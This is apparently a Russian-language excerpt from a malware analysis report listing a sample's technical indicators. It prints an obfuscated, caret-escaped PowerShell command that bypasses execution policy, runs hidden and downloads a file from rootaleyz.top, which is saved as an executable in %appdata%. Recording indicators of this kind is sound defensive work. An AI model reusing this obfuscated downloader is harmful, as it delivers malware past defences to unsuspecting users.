Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^eR^sHELL^.Exe^ -Exe^C^U^tiOnp^OLIC^y^ ^bY^PAsS -^noPR^o^FIL^E -^w^i^n^d^O^W^stY^L^E ^h^idd^eN (neW-OBJ^ecT s^ys^t^eM.^neT.^wEbClI^e^N^t).doW^n^L^OA^DFI^lE('http://rootaleyz.top/...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /C "POW^eR^sHELL^.Exe^ -Exe^C^U^tiOnp^OLIC^y^ ^bY^PAsS -^noPR^o^FIL^E -^w^i^n^d^O^W^stY^L^E ^h^idd^eN (neW-OBJ^ecT s^ys^t^eM.^neT.^wEbClI^e^N^t).doW^n^L^OA^DFI^lE('http://rootaleyz.top/...' (со скрытым окном)